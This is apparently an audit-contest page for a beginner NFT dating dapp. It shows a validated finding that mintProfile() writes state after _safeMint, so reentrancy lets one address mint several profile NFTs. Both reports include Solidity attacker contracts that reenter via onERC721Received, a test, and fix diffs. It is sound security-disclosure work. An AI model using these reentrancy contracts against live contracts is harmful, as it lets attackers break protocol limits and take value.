DatingDapp

AI First Flight #6

Beginner FriendlyFoundrySolidityNFT

EXP

View results

Previous Next

Submission Details

Severity: medium

Valid

Reentrancy in `mintProfile()` bypasses the one-profile-per-user limit

jfornells

Severity

Medium

Likelihood

High

Root + Impact

mintProfile() records profileToToken[msg.sender] after _safeMint(), allowing reentrancy to mint multiple profiles before the one-profile limit is enforced.

Description

The intended behavior is that each address can mint only one dating profile NFT.
The issue is that _safeMint() is executed before profileToToken[msg.sender] is updated. If the recipient is a contract, it can reenter through onERC721Received() while the mapping still shows no existing profile, allowing repeated mints in the same transaction.

function mintProfile(string memory name, uint8 age, string memory profileImage) external {

require(profileToToken[msg.sender] == 0, "Profile already exists");

uint256 tokenId = ++_nextTokenId;

@> _safeMint(msg.sender, tokenId);

_profiles[tokenId] = Profile(name, age, profileImage);

@> profileToToken[msg.sender] = tokenId;

emit ProfileMinted(msg.sender, tokenId, name, age, profileImage);

}

Risk

Likelihood: High

A contract recipient can reliably trigger the reentrancy through onERC721Received().
No unusual conditions are required beyond minting through a contract.

Impact: Medium

One address can mint multiple profile NFTs.
This breaks the protocol’s core uniqueness rule for user profiles.

Proof of Concept

The following test shows that a contract can reenter during _safeMint() and mint multiple profiles for the same address.

contract ReentrancyAttack is IERC721Receiver {

string public name = "Jorx";

string public profileImage;

uint8 public age = 30;

address public soulBoundNFT;

constructor(address _soulBoundNFT) {

soulBoundNFT = _soulBoundNFT;

}

function attackMint() external {

// Start the first mint. The reentrancy happens during the receiver hook.

ISoulBound(soulBoundNFT).mintProfile(name, age, profileImage);

}

function onERC721Received(

address,

uint256,

bytes calldata

) external returns (bytes4) {

// Reenter before profileToToken[msg.sender] is updated.

// This keeps passing the "Profile already exists" check.

if (ISoulBound(soulBoundNFT).balanceOf(address(this)) < 5) {

ISoulBound(soulBoundNFT).mintProfile(name, age, profileImage);

}

return IERC721Receiver.onERC721Received.selector;

}

function test_Reentrancy_AllowsMultipleProfilesPerUser() public {

// Deploy the attacker contract so it can receive ERC721 tokens

// and reenter through onERC721Received().

ReentrancyAttack attacker = new ReentrancyAttack(address(soulboundNFT));

// Trigger the first mint, which recursively mints additional profiles.

attacker.attackMint();

// The same address ends up holding multiple profile NFTs.

assertEq(soulboundNFT.balanceOf(address(attacker)), 5);

}

Recommended Mitigation

Record the user’s profile token before calling _safeMint() so the one-profile limit is consumed before the receiver hook can execute.

function mintProfile(string memory name, uint8 age, string memory profileImage) external {

require(profileToToken[msg.sender] == 0, "Profile already exists");

uint256 tokenId = ++_nextTokenId;

+ profileToToken[msg.sender] = tokenId;

_safeMint(msg.sender, tokenId);

_profiles[tokenId] = Profile(name, age, profileImage);

- profileToToken[msg.sender] = tokenId;

emit ProfileMinted(msg.sender, tokenId, name, age, profileImage);

}

Updates

Lead Judging Commences

ai-first-flight-judge Lead Judge about 2 hours ago

Submission Judgement Published

Validated

Assigned finding tags:

[M-04] Reentrancy in `SoulboundProfileNft::mintProfile` allows minting multiple NFTs per address, which disrupts protocol expectations

## Description In `mintProfile`, the internal `_safeMint` function is called before updating the contract state (`_profiles[tokenId]` and `profileToToken[msg.sender]`). This violates CEI, as `_safeMint` calls an internal function that could invoke an external contract if `msg.sender` is a contract with a malicious `onERC721Received` implementation. Source Code: ```solidity function mintProfile(string memory name, uint8 age, string memory profileImage) external { require(profileToToken[msg.sender] == 0, "Profile already exists"); uint256 tokenId = ++_nextTokenId; _safeMint(msg.sender, tokenId); // Store metadata on-chain _profiles[tokenId] = Profile(name, age, profileImage); profileToToken[msg.sender] = tokenId; emit ProfileMinted(msg.sender, tokenId, name, age, profileImage); } ``` ## Vulnerability Details Copy this test and auxiliary contract in the unit test suite to prove that an attacker can mint multiple NFTs: ```solidity function testReentrancyMultipleNft() public { MaliciousContract maliciousContract = new MaliciousContract( address(soulboundNFT) ); vm.prank(address(maliciousContract)); MaliciousContract(maliciousContract).attack(); assertEq(soulboundNFT.balanceOf(address(maliciousContract)), 2); assertEq(soulboundNFT.profileToToken(address(maliciousContract)), 1); } ``` ```Solidity contract MaliciousContract { SoulboundProfileNFT soulboundNFT; uint256 counter; constructor(address _soulboundNFT) { soulboundNFT = SoulboundProfileNFT(_soulboundNFT); } // Malicious reentrancy attack function attack() external { soulboundNFT.mintProfile("Evil", 99, "malicious.png"); } // Malicious onERC721Received function function onERC721Received( address operator, address from, uint256 tokenId, bytes calldata data ) external returns (bytes4) { // Reenter the mintProfile function if (counter == 0) { counter++; soulboundNFT.mintProfile("EvilAgain", 100, "malicious2.png"); } return 0x150b7a02; } } ``` ## Impact The attacker could end up having multiple NTFs, but only one profile. This is because the `mintProfile`function resets the `profileToToken`mapping each time. At the end, the attacker will have only one profile connecting with one token ID with the information of the first mint. I consider that the severity is Low because the `LikeRegistry`contract works with the token IDs, not the NFTs. So, the impact will be a disruption in the relation of the amount of NTFs and the amount of profiles. ## Recommendations To follow CEI properly, move `_safeMint` to the end: ```diff function mintProfile(string memory name, uint8 age, string memory profileImage) external { require(profileToToken[msg.sender] == 0, "Profile already exists"); uint256 tokenId = ++_nextTokenId; - _safeMint(msg.sender, tokenId); // Store metadata on-chain _profiles[tokenId] = Profile(name, age, profileImage); profileToToken[msg.sender] = tokenId; + _safeMint(msg.sender, tokenId); emit ProfileMinted(msg.sender, tokenId, name, age, profileImage); } ```

Rewards breakdown

This contest has a flat reward structure with the following payouts:

Live

The contest is live. Earn rewards by submitting a finding.

Judging

Submissions are being reviewed by our AI judge. Results will be available in a few minutes.

View all submissions

Rewards Distribution

The contest is complete and the rewards are being distributed.

Support

FAQs

Can't find an answer? Chat with us on Discord, Twitter or Linkedin.

Give us feedback!